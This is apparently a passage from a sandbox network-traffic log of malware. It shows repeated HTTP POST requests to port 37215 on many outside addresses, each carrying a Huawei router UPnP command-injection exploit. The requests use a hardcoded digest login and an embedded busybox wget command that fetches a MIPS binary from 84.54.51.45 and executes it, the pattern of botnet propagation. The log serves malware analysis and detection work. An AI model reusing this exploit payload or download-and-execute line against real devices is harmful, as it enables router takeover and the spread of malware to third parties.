2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1472192.168.2.153791241.28.88.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.735084057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1473192.168.2.153484841.9.142.21737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.735121965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1474192.168.2.155616441.115.200.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.735126019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1475192.168.2.155521841.166.24.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107193947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1476192.168.2.154656641.143.141.9437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107263088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1477192.168.2.155679641.133.234.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107278109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1478192.168.2.153579241.73.133.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107291937 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1479192.168.2.156007441.97.65.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107291937 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1480192.168.2.154779241.133.59.14437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107296944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1481192.168.2.155017641.126.89.17437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107346058 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1482192.168.2.154483641.27.41.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107346058 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
